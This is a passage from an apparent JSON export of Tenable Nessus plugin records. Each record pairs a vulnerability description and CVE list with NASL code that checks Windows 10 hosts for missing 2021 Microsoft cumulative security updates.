script_set_attribute(attribute:\"stig_severity\", value:\"I\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"Windows : Microsoft Bulletins\");\n\n script_copyright(english:\"This script is Copyright (C) 2021-2022 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"smb_check_rollup.nasl\", \"smb_hotfixes.nasl\", \"ms_bulletin_checks_possible.nasl\");\n script_require_keys(\"SMB/MS_Bulletin_Checks/Possible\");\n script_require_ports(139, 445, \"Host/patch_management_checks\");\n\n exit(0);\n}\n\ninclude('smb_func.inc');\ninclude('smb_hotfixes.inc');\ninclude('smb_hotfixes_fcheck.inc');\ninclude('smb_reg_query.inc');\n\nget_kb_item_or_exit('SMB/MS_Bulletin_Checks/Possible');\n\nbulletin = 'MS21-08';\nkbs = make_list(\n '5005043'\n);\n\nif (get_kb_item('Host/patch_management_checks')) hotfix_check_3rd_party(bulletin:bulletin, kbs:kbs, severity:SECURITY_HOLE);\n\nget_kb_item_or_exit('SMB/Registry/Enumerated');\nget_kb_item_or_exit('SMB/WindowsVersion', exit_code:1);\n\nif (hotfix_check_sp_range(win10:'0') <= 0) audit(AUDIT_OS_SP_NOT_VULN);\n\nshare = hotfix_get_systemdrive(as_share:TRUE, exit_on_fail:TRUE);\nif (!is_accessible_share(share:share)) audit(AUDIT_SHARE_FAIL, share);\n\nif (\n smb_check_rollup(os:'10', \n sp:0,\n os_build:14393,\n rollup_date:'08_2021',\n bulletin:bulletin,\n rollup_kb_list:[5005043])\n)\n{\n replace_kb_item(name:'SMB/Missing/'+bulletin, value:TRUE);\n hotfix_security_hole();\n hotfix_check_fversion_end();\n exit(0);\n}\nelse\n{\n hotfix_check_fversion_end();\n audit(AUDIT_HOST_NOT, hotfix_get_audit_report());\n}\n", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2023-05-18T15:25:12", "description": "The remote Windows host is missing security update 4601319.\nIt is, therefore, affected by multiple vulnerabilities :\n\n - An information disclosure vulnerability. An attacker can exploit this to disclose potentially sensitive information. (CVE-2021-1734, CVE-2021-24076, CVE-2021-24079, CVE-2021-24084, CVE-2021-24106)\n\n - A denial of service (DoS) vulnerability. An attacker can exploit this issue to cause the affected component to deny system or application services. (CVE-2021-24075, CVE-2021-24080, CVE-2021-24086, CVE-2021-24098)\n\n - A remote code execution vulnerability. An attacker can exploit this to bypass authentication and execute unauthorized arbitrary commands. (CVE-2021-1722, CVE-2021-24074, CVE-2021-24077, CVE-2021-24081, CVE-2021-24083, CVE-2021-24088, CVE-2021-24091, CVE-2021-24093, CVE-2021-24094)\n\n - An elevation of privilege vulnerability. An attacker can exploit this to gain elevated privileges.\n (CVE-2021-1698, CVE-2021-1727, CVE-2021-1732, CVE-2021-24096, CVE-2021-24102, CVE-2021-24103, CVE-2021-25195)\n\n - A security feature bypass vulnerability exists. An attacker can exploit this and bypass the security feature and perform unauthorized actions compromising the integrity of the system/application. (CVE-2021-1731, CVE-2021-24082)", "cvss3": {}, "published": "2021-02-09T00:00:00", "type": "nessus", "title": "KB4601319: Windows 10 version 2004 Feb 2021 Security Update", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2021-1698", "CVE-2021-1722", "CVE-2021-1727", "CVE-2021-1731", "CVE-2021-1732", "CVE-2021-1734", "CVE-2021-24074", "CVE-2021-24075", "CVE-2021-24076", "CVE-2021-24077", "CVE-2021-24078", "CVE-2021-24079", "CVE-2021-24080", "CVE-2021-24081", "CVE-2021-24082", "CVE-2021-24083", "CVE-2021-24084", "CVE-2021-24086", "CVE-2021-24088", "CVE-2021-24091", "CVE-2021-24093", "CVE-2021-24094", "CVE-2021-24096", "CVE-2021-24098", "CVE-2021-24102", "CVE-2021-24103", "CVE-2021-24106", "CVE-2021-25195"], "modified": "2023-01-20T00:00:00", "cpe": ["cpe:/o:microsoft:windows"], "id": "SMB_NT_MS21_FEB_4601319.NASL", "href": "https://www.tenable.com/plugins/nessus/146345", "sourceData": "##\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were\n# extracted from the Microsoft Security Updates API. The text\n# itself is copyright (C) Microsoft Corporation.\n##\n\ninclude('compat.inc');\n\nif (description)\n{\n script_id(146345);\n script_version(\"1.12\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2023/01/20\");\n\n script_cve_id(\n \"CVE-2021-1698\",\n \"CVE-2021-1722\",\n \"CVE-2021-1727\",\n \"CVE-2021-1731\",\n \"CVE-2021-1732\",\n \"CVE-2021-1734\",\n \"CVE-2021-24074\",\n \"CVE-2021-24075\",\n \"CVE-2021-24076\",\n \"CVE-2021-24077\",\n \"CVE-2021-24078\",\n \"CVE-2021-24079\",\n \"CVE-2021-24080\",\n \"CVE-2021-24081\",\n \"CVE-2021-24082\",\n \"CVE-2021-24083\",\n \"CVE-2021-24084\",\n \"CVE-2021-24086\",\n \"CVE-2021-24088\",\n \"CVE-2021-24091\",\n \"CVE-2021-24093\",\n \"CVE-2021-24094\",\n \"CVE-2021-24096\",\n \"CVE-2021-24098\",\n \"CVE-2021-24102\",\n \"CVE-2021-24103\",\n \"CVE-2021-24106\",\n \"CVE-2021-25195\"\n );\n script_xref(name:\"MSKB\", value:\"4601319\");\n script_xref(name:\"MSFT\", value:\"MS21-4601319\");\n script_xref(name:\"IAVA\", value:\"2021-A-0072-S\");\n script_xref(name:\"IAVA\", value:\"2021-A-0093-S\");\n script_xref(name:\"CISA-KNOWN-EXPLOITED\", value:\"2021/11/17\");\n\n script_name(english:\"KB4601319: Windows 10 version 2004 Feb 2021 Security Update\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote host is missing one or more security updates.\");\n script_set_attribute(attribute:\"description\", value:\n\"The remote Windows host is missing security update 4601319.\nIt is, therefore, affected by multiple vulnerabilities :\n\n - An information disclosure vulnerability. An attacker can\n exploit this to disclose potentially sensitive\n information. (CVE-2021-1734, CVE-2021-24076,\n CVE-2021-24079, CVE-2021-24084, CVE-2021-24106)\n\n - A denial of service (DoS) vulnerability. An attacker can\n exploit this issue to cause the affected component to\n deny system or application services. (CVE-2021-24075,\n CVE-2021-24080, CVE-2021-24086, CVE-2021-24098)\n\n - A remote code execution vulnerability. An attacker can\n exploit this to bypass authentication and execute\n unauthorized arbitrary commands. (CVE-2021-1722,\n CVE-2021-24074, CVE-2021-24077, CVE-2021-24081,\n CVE-2021-24083, CVE-2021-24088, CVE-2021-24091,\n CVE-2021-24093, CVE-2021-24094)\n\n - An elevation of privilege vulnerability. An attacker can\n exploit this to gain elevated privileges.\n (CVE-2021-1698, CVE-2021-1727, CVE-2021-1732,\n CVE-2021-24096, CVE-2021-24102, CVE-2021-24103,\n CVE-2021-25195)\n\n - A security feature bypass vulnerability exists. An\n attacker can exploit this and bypass the security\n feature and perform unauthorized actions compromising\n the integrity of the system/application. (CVE-2021-1731,\n CVE-2021-24082)\");\n script_set_attribute(attribute:\"see_also\", value:\"https://support.microsoft.com/en-us/help/4601319\");\n script_set_attribute(attribute:\"solution\", value:\n\"Microsoft has released KB4601319 to address this issue.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_set_cvss_temporal_vector(\"CVSS2#E:H/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:H/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2021-24094\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_core\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'Win32k ConsoleControl Offset Confusion');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_canvas\", value:\"true\");\n script_set_attribute(attribute:\"canvas_package\", value:\"CANVAS\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2021/02/09\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2021/02/09\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2021/02/09\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:microsoft:windows\");\n script_set_attribute(attribute:\"stig_severity\", value:\"I\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"Windows : Microsoft Bulletins\");\n\n script_copyright(english:\"This script is Copyright (C) 2021-2023 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"smb_check_rollup.nasl\", \"smb_hotfixes.nasl\", \"ms_bulletin_checks_possible.nasl\");\n script_require_keys(\"SMB/MS_Bulletin_Checks/Possible\");\n script_require_ports(139, 445, \"Host/patch_management_checks\");\n\n exit(0);\n}\n\ninclude('smb_func.inc');\ninclude('smb_hotfixes.inc');\ninclude('smb_hotfixes_fcheck.inc');\ninclude('smb_reg_query.inc');\n\nget_kb_item_or_exit('SMB/MS_Bulletin_Checks/Possible');\n\nbulletin = 'MS21-02';\nkbs = make_list(\n '4601319'\n);\n\nif (get_kb_item('Host/patch_management_checks')) hotfix_check_3rd_party(bulletin:bulletin, kbs:kbs, severity:SECURITY_HOLE);\n\nget_kb_item_or_exit('SMB/Registry/Enumerated');\nget_kb_item_or_exit('SMB/WindowsVersion', exit_code:1);\n\nif (hotfix_check_sp_range(win10:'0') <= 0) audit(AUDIT_OS_SP_NOT_VULN);\n\nshare = hotfix_get_systemdrive(as_share:TRUE, exit_on_fail:TRUE);\nif (!is_accessible_share(share:share)) audit(AUDIT_SHARE_FAIL, share);\n\nif (\n smb_check_rollup(os:'10',\n sp:0,\n os_build:'19041',\n rollup_date:'02_2021',\n bulletin:bulletin,\n rollup_kb_list:[4601319])\n|| \nsmb_check_rollup(os:'10',\n sp:0,\n os_build:'19042',\n rollup_date:'02_2021',\n bulletin:bulletin,\n rollup_kb_list:[4601319])\n)\n{\n replace_kb_item(name:'SMB/Missing/'+bulletin, value:TRUE);\n hotfix_security_hole();\n hotfix_check_fversion_end();\n exit(0);\n}\nelse\n{\n hotfix_check_fversion_end();\n audit(AUDIT_HOST_NOT, hotfix_get_audit_report());\n}\n", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2023-05-19T15:13:14", "description": "The remote Windows host is missing security update 5005031.\nIt is, therefore, affected by multiple vulnerabilities :\n\n - A remote code execution vulnerability. An attacker can exploit this to bypass authentication and execute unauthorized arbitrary commands. (CVE-2021-26424, CVE-2021-26432, CVE-2021-34530, CVE-2021-34533, CVE-2021-34534, CVE-2021-34535, CVE-2021-36936, CVE-2021-36937, CVE-2021-36947)\n\n - An elevation of privilege vulnerability. An attacker can exploit this to gain elevated privileges.\n (CVE-2021-26425, CVE-2021-26426, CVE-2021-34483, CVE-2021-34484, CVE-2021-34486, CVE-2021-34487, CVE-2021-34536, CVE-2021-34537, CVE-2021-36948)\n\n - An information disclosure vulnerability. An attacker can exploit this to disclose potentially sensitive information. (CVE-2021-26433, CVE-2021-36926, CVE-2021-36932, CVE-2021-36933)\n\n - An memory corruption vulnerability exists. An attacker can exploit this to corrupt the memory and cause unexpected behaviors within the system/application.\n (CVE-2021-34480)", "cvss3": {}, "published": "2021-08-10T00:00:00", "type": "nessus", "title": "KB5005031: Windows 10 Version 1909 Security Update (August 2021)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2021-26424", "CVE-2021-26425", "CVE-2021-26426", "CVE-2021-26432", "CVE-2021-26433", "CVE-2021-34480", "CVE-2021-34481", "CVE-2021-34483", "CVE-2021-34484", "CVE-2021-34486", "CVE-2021-34487", "CVE-2021-34530", "CVE-2021-34533", "CVE-2021-34534", "CVE-2021-34535", "CVE-2021-34536", "CVE-2021-34537", "CVE-2021-36926", "CVE-2021-36932", "CVE-2021-36933", "CVE-2021-36936", "CVE-2021-36937", "CVE-2021-36947", "CVE-2021-36948"], "modified": "2022-04-07T00:00:00", "cpe": ["cpe:/o:microsoft:windows"], "id": "SMB_NT_MS21_AUG_5005031.NASL", "href": "https://www.tenable.com/plugins/nessus/152430", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from the Microsoft Security Updates API. The text\n# itself is copyright (C) Microsoft Corporation.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(152430);\n script_version(\"1.10\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2022/04/07\");\n\n script_cve_id(\n \"CVE-2021-26424\",\n \"CVE-2021-26425\",\n \"CVE-2021-26426\",\n \"CVE-2021-26432\",\n \"CVE-2021-26433\",\n \"CVE-2021-34480\",\n \"CVE-2021-34481\",\n \"CVE-2021-34483\",\n \"CVE-2021-34484\",\n \"CVE-2021-34486\",\n \"CVE-2021-34487\",\n \"CVE-2021-34530\",\n \"CVE-2021-34533\",\n \"CVE-2021-34534\",\n \"CVE-2021-34535\",\n \"CVE-2021-34536\",\n \"CVE-2021-34537\",\n \"CVE-2021-36926\",\n \"CVE-2021-36932\",\n \"CVE-2021-36933\",\n \"CVE-2021-36936\",\n \"CVE-2021-36937\",\n \"CVE-2021-36947\",\n \"CVE-2021-36948\"\n );\n script_xref(name:\"MSKB\", value:\"5005031\");\n script_xref(name:\"MSFT\", value:\"MS21-5005031\");\n script_xref(name:\"IAVA\", value:\"2021-A-0373-S\");\n script_xref(name:\"IAVA\", value:\"2021-A-0374-S\");\n script_xref(name:\"CISA-KNOWN-EXPLOITED\", value:\"2021/11/17\");\n script_xref(name:\"CISA-KNOWN-EXPLOITED\", value:\"2022/04/18\");\n script_xref(name:\"CISA-KNOWN-EXPLOITED\", value:\"2022/04/21\");\n\n script_name(english:\"KB5005031: Windows 10 Version 1909 Security Update (August 2021)\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote Windows host is affected by multiple vulnerabilities.\");\n script_set_attribute(attribute:\"description\", value:\n\"The remote Windows host is missing security update 5005031.\nIt is, therefore, affected by multiple vulnerabilities :\n\n - A remote code execution vulnerability. An attacker can\n exploit this to bypass authentication and execute\n unauthorized arbitrary commands. (CVE-2021-26424,\n CVE-2021-26432, CVE-2021-34530, CVE-2021-34533,\n CVE-2021-34534, CVE-2021-34535, CVE-2021-36936,\n CVE-2021-36937, CVE-2021-36947)\n\n - An elevation of privilege vulnerability. An attacker can\n exploit this to gain elevated privileges.\n (CVE-2021-26425, CVE-2021-26426, CVE-2021-34483,\n CVE-2021-34484, CVE-2021-34486, CVE-2021-34487,\n CVE-2021-34536, CVE-2021-34537, CVE-2021-36948)\n\n - An information disclosure vulnerability. An attacker can\n exploit this to disclose potentially sensitive\n information. (CVE-2021-26433, CVE-2021-36926,\n CVE-2021-36932, CVE-2021-36933)\n\n - An memory corruption vulnerability exists. An attacker\n can exploit this to corrupt the memory and cause\n unexpected behaviors within the system/application.\n (CVE-2021-34480)\");\n # https://support.microsoft.com/en-us/topic/august-10-2021-kb5005031-os-build-18363-1734-8af726da-a39b-417d-a5fb-670c42d69e78\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?819616f3\");\n script_set_attribute(attribute:\"solution\", value:\n\"Apply Cumulative Update KB5005031.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_set_cvss_temporal_vector(\"CVSS2#E:H/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:H/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2021-36936\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2021/08/10\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2021/08/10\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2021/08/10\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:microsoft:windows\");\n script_set_attribute(attribute:\"stig_severity\", value:\"I\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"Windows : Microsoft Bulletins\");\n\n script_copyright(english:\"This script is Copyright (C) 2021-2022 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"smb_check_rollup.nasl\", \"smb_hotfixes.nasl\", \"ms_bulletin_checks_possible.nasl\");\n script_require_keys(\"SMB/MS_Bulletin_Checks/Possible\");\n script_require_ports(139, 445, \"Host/patch_management_checks\");\n\n exit(0);\n}\n\ninclude('smb_func.inc');\ninclude('smb_hotfixes.inc');\ninclude('smb_hotfixes_fcheck.inc');\ninclude('smb_reg_query.inc');\n\nget_kb_item_or_exit('SMB/MS_Bulletin_Checks/Possible');\n\nbulletin = 'MS21-08';\nkbs = make_list(\n '5005031'\n);\n\nif (get_kb_item('Host/patch_management_checks')) hotfix_check_3rd_party(bulletin:bulletin, kbs:kbs, severity:SECURITY_HOLE);\n\nget_kb_item_or_exit('SMB/Registry/Enumerated');\nget_kb_item_or_exit('SMB/WindowsVersion', exit_code:1);\n\nif (hotfix_check_sp_range(win10:'0') <= 0) audit(AUDIT_OS_SP_NOT_VULN);\n\nshare = hotfix_get_systemdrive(as_share:TRUE, exit_on_fail:TRUE);\nif (!is_accessible_share(share:share)) audit(AUDIT_SHARE_FAIL, share);\n\nif (\n smb_check_rollup(os:'10', \n sp:0,\n os_build:18363,\n rollup_date:'08_2021',\n bulletin:bulletin,\n rollup_kb_list:[5005031])\n)\n{\n replace_kb_item(name:'SMB/Missing/'+bulletin, value:TRUE);\n hotfix_security_hole();\n hotfix_check_fversion_end();\n exit(0);\n}\nelse\n{\n hotfix_check_fversion_end();\n audit(AUDIT_HOST_NOT, hotfix_get_audit_report());\n}\n", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2023-05-18T15:35:17", "description": "The remote Windows host is missing security update 5007186.\nIt is, therefore, affected by multiple vulnerabilities:\n\n - An elevation of privilege vulnerability. An attacker can exploit this to gain elevated privileges.\n (CVE-2021-36957, CVE-2021-41366, CVE-2021-41367, CVE-2021-41370, CVE-2021-41377, CVE-2021-41379, CVE-2021-42277, CVE-2021-42280, CVE-2021-42283, CVE-2021-42285, CVE-2021-42286)\n\n - A remote code execution vulnerability. An attacker can exploit this to bypass authentication and execute unauthorized arbitrary commands. (CVE-2021-26443, CVE-2021-38666, CVE-2021-41378, CVE-2021-42275, CVE-2021-42276, CVE-2021-42279)\n\n - An information disclosure vulnerability. An attacker can exploit this to disclose potentially sensitive information. (CVE-2021-38631, CVE-2021-38665, CVE-2021-41371)\n\n - A security feature bypass vulnerability exists. An attacker can exploit this and bypass the security feature and perform unauthorized actions compromising the integrity of the system/application.\n (CVE-2021-42288)\n\n - A denial of service (DoS) vulnerability. An attacker can exploit this issue to cause the affected component to deny system or application services. (CVE-2021-41356, CVE-2021-42274, CVE-2021-42284)", "cvss3": {}, "published": "2021-11-09T00:00:00", "type": "nessus", "title": "KB5007186: Windows 10 Version 2004 / Windows 10 Version 20H2 / Windows 10 Version 21H1 (November 2021) ", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2021-26443", "CVE-2021-36957", "CVE-2021-38631", "CVE-2021-38665", "CVE-2021-38666", "CVE-2021-41351", "CVE-2021-41356", "CVE-2021-41366", "CVE-2021-41367", "CVE-2021-41370", "CVE-2021-41371", "CVE-2021-41377", "CVE-2021-41378", "CVE-2021-41379", "CVE-2021-42274", "CVE-2021-42275", "CVE-2021-42276", "CVE-2021-42277", "CVE-2021-42278", "CVE-2021-42279", "CVE-2021-42280", "CVE-2021-42282", "CVE-2021-42283", "CVE-2021-42284", "CVE-2021-42285", "CVE-2021-42286", "CVE-2021-42287", "CVE-2021-42288", "CVE-2021-42291"], "modified": "2022-12-05T00:00:00", "cpe": ["cpe:/o:microsoft:windows"], "id": "SMB_NT_MS21_NOV_5007186.NASL", "href": "https://www.tenable.com/plugins/nessus/154986", "sourceData": "#%NASL_MIN_LEVEL 70300\n##\n# (C) Tenable, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from the Microsoft Security Updates API. The text\n# itself is copyright (C) Microsoft Corporation.\n##\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(154986);\n script_version(\"1.12\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2022/12/05\");\n\n script_cve_id(\n \"CVE-2021-26443\",\n \"CVE-2021-36957\",\n \"CVE-2021-38631\",\n \"CVE-2021-38665\",\n \"CVE-2021-38666\",\n \"CVE-2021-41351\",\n \"CVE-2021-41356\",\n \"CVE-2021-41366\",\n \"CVE-2021-41367\",\n \"CVE-2021-41370\",\n \"CVE-2021-41371\",\n \"CVE-2021-41377\",\n \"CVE-2021-41378\",\n \"CVE-2021-41379\",\n \"CVE-2021-42274\",\n \"CVE-2021-42275\",\n \"CVE-2021-42276\",\n \"CVE-2021-42277\",\n \"CVE-2021-42278\",\n \"CVE-2021-42279\",\n \"CVE-2021-42280\",\n \"CVE-2021-42282\",\n \"CVE-2021-42283\",\n \"CVE-2021-42284\",\n \"CVE-2021-42285\",\n \"CVE-2021-42286\",\n \"CVE-2021-42287\",\n \"CVE-2021-42288\",\n \"CVE-2021-42291\"\n );\n script_xref(name:\"MSKB\", value:\"5007186\");\n script_xref(name:\"MSFT\", value:\"MS21-5007186\");\n script_xref(name:\"IAVA\", value:\"2021-A-0539-S\");\n script_xref(name:\"IAVA\", value:\"2021-A-0545-S\");\n script_xref(name:\"IAVA\", value:\"2021-A-0544-S\");\n script_xref(name:\"CISA-KNOWN-EXPLOITED\", value:\"2022/03/17\");\n script_xref(name:\"CISA-KNOWN-EXPLOITED\", value:\"2022/05/02\");\n script_xref(name:\"CEA-ID\", value:\"CEA-2021-0053\");\n\n script_name(english:\"KB5007186: Windows 10 Version 2004 / Windows 10 Version 20H2 / Windows 10 Version 21H1 (November 2021) \");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote Windows host is affected by multiple vulnerabilities.\");\n script_set_attribute(attribute:\"description\", value:\n\"The remote Windows host is missing security update 5007186.\nIt is, therefore, affected by multiple vulnerabilities:\n\n - An elevation of privilege vulnerability. An attacker can\n exploit this to gain elevated privileges.\n (CVE-2021-36957, CVE-2021-41366, CVE-2021-41367,\n CVE-2021-41370, CVE-2021-41377, CVE-2021-41379,\n CVE-2021-42277, CVE-2021-42280, CVE-2021-42283,\n CVE-2021-42285, CVE-2021-42286)\n\n - A remote code execution vulnerability. An attacker can\n exploit this to bypass authentication and execute\n unauthorized arbitrary commands. (CVE-2021-26443,\n CVE-2021-38666, CVE-2021-41378, CVE-2021-42275,\n CVE-2021-42276, CVE-2021-42279)\n\n - An information disclosure vulnerability. An attacker can\n exploit this to disclose potentially sensitive\n information. (CVE-2021-38631, CVE-2021-38665,\n CVE-2021-41371)\n\n - A security feature bypass vulnerability exists. An\n attacker can exploit this and bypass the security\n feature and perform unauthorized actions compromising\n the integrity of the system/application.\n (CVE-2021-42288)\n\n - A denial of service (DoS) vulnerability. An attacker can\n exploit this issue to cause the affected component to\n deny system or application services. (CVE-2021-41356,\n CVE-2021-42274, CVE-2021-42284)\");\n script_set_attribute(attribute:\"see_also\", value:\"https://support.microsoft.com/en-us/help/5007186\");\n script_set_attribute(attribute:\"solution\", value:\n\"Apply Cumulative Update KB5007186.\");\n script_set_cvss_base_vector(\"CVSS2#AV:A/AC:L/Au:S/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:H/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:A/AC:L/PR:L/UI:N/S:C/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:H/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2021-26443\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2021/11/09\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2021/11/09\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2021/11/09\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:microsoft:windows\");\n script_set_attribute(attribute:\"stig_severity\", value:\"I\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"Windows : Microsoft Bulletins\");\n\n script_copyright(english:\"This script is Copyright (C) 2021-2022 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"smb_check_rollup.nasl\", \"smb_hotfixes.nasl\", \"ms_bulletin_checks_possible.nasl\");\n script_require_keys(\"SMB/MS_Bulletin_Checks/Possible\");\n script_require_ports(139, 445, \"Host/patch_management_checks\");\n\n exit(0);\n}\n\ninclude('smb_hotfixes_fcheck.inc');\ninclude('smb_hotfixes.inc');\ninclude('smb_func.inc');\n\nget_kb_item_or_exit('SMB/MS_Bulletin_Checks/Possible');\n\nbulletin = \"MS21-11\";\nkbs = make_list('5007186');\n\nif (get_kb_item('Host/patch_management_checks')) hotfix_check_3rd_party(bulletin:bulletin, kbs:kbs, severity:SECURITY_HOLE);\n\nget_kb_item_or_exit('SMB/Registry/Enumerated');\nget_kb_item_or_exit('SMB/WindowsVersion', exit_code:1);\n\nif (hotfix_check_sp_range(win10:'0') <= 0) audit(AUDIT_OS_SP_NOT_VULN);\n\nshare = hotfix_get_systemdrive(as_share:TRUE, exit_on_fail:TRUE);\nif (!is_accessible_share(share:share)) audit(AUDIT_SHARE_FAIL, share);\n\nif (\n smb_check_rollup(os:\"10\",\n sp:0,\n os_build:'19041',\n rollup_date:'11_2021',\n bulletin:bulletin,\n rollup_kb_list:[5007186])\n|| \n smb_check_rollup(os:\"10\",\n sp:0,\n os_build:'19042',\n rollup_date:'11_2021',\n bulletin:bulletin,\n rollup_kb_list:[5007186]) \n|| \n smb_check_rollup(os:\"10\",\n sp:0,\n os_build:'19043',\n rollup_date:'11_2021',\n bulletin:bulletin,\n rollup_kb_list:[5007186]) \n)\n{\n replace_kb_item(name:'SMB/Missing/'+bulletin, value:TRUE);\n hotfix_security_hole();\n hotfix_check_fversion_end();\n exit(0);\n}\nelse\n{\n hotfix_check_fversion_end();\n audit(AUDIT_HOST_NOT, hotfix_get_audit_report());\n}\n", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2023-05-19T15:13:14", "description": "The remote Windows host is missing security update 5005030.\nIt is, therefore, affected by multiple vulnerabilities :\n\n - A remote code execution vulnerability. An attacker can exploit this to bypass authentication and execute unauthorized arbitrary commands. (CVE-2021-26424, CVE-2021-26432, CVE-2021-34530, CVE-2021-34533, CVE-2021-34534, CVE-2021-34535, CVE-2021-36936, CVE-2021-36937, CVE-2021-36947)\n\n - A session spoofing vulnerability exists. An attacker can exploit this to perform actions with the privileges of another user. (CVE-2021-36942)\n\n - An elevation of privilege vulnerability. An attacker can exploit this to gain elevated privileges.\n (CVE-2021-26425, CVE-2021-26426, CVE-2021-34483, CVE-2021-34484, CVE-2021-34486, CVE-2021-34487, CVE-2021-34536, CVE-2021-34537, CVE-2021-36948)\n\n - An memory corruption vulnerability exists. An attacker can exploit this to corrupt the memory and cause unexpected behaviors within the system/application.\n (CVE-2021-34480)\n\n - An information disclosure vulnerability. An attacker can exploit this to disclose potentially sensitive information. (CVE-2021-26433, CVE-2021-36926, CVE-2021-36932, CVE-2021-36933, CVE-2021-36938)", "cvss3": {}, "published": "2021-08-10T00:00:00", "type": "nessus", "title": "KB5005030: Windows 10 Version 1809 and Windows Server 2019 Security Update (August 2021)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2021-26424", "CVE-2021-26425", "CVE-2021-26426", "CVE-2021-26432", "CVE-2021-26433", "CVE-2021-34480", "CVE-2021-34481", "CVE-2021-34483", "CVE-2021-34484", "CVE-2021-34486", "CVE-2021-34487", "CVE-2021-34530", "CVE-2021-34533", "CVE-2021-34534", "CVE-2021-34535", "CVE-2021-34536", "CVE-2021-34537", "CVE-2021-36926", "CVE-2021-36932", "CVE-2021-36933", "CVE-2021-36936", "CVE-2021-36937", "CVE-2021-36938", "CVE-2021-36942", "CVE-2021-36947", "CVE-2021-36948"], "modified": "2022-04-07T00:00:00", "cpe": ["cpe:/o:microsoft:windows"], "id": "SMB_NT_MS21_AUG_5005030.NASL", "href": "https://www.tenable.com/plugins/nessus/152435", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from the Microsoft Security Updates API. The text\n# itself is copyright (C) Microsoft Corporation.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(152435);\n script_version(\"1.10\");\n 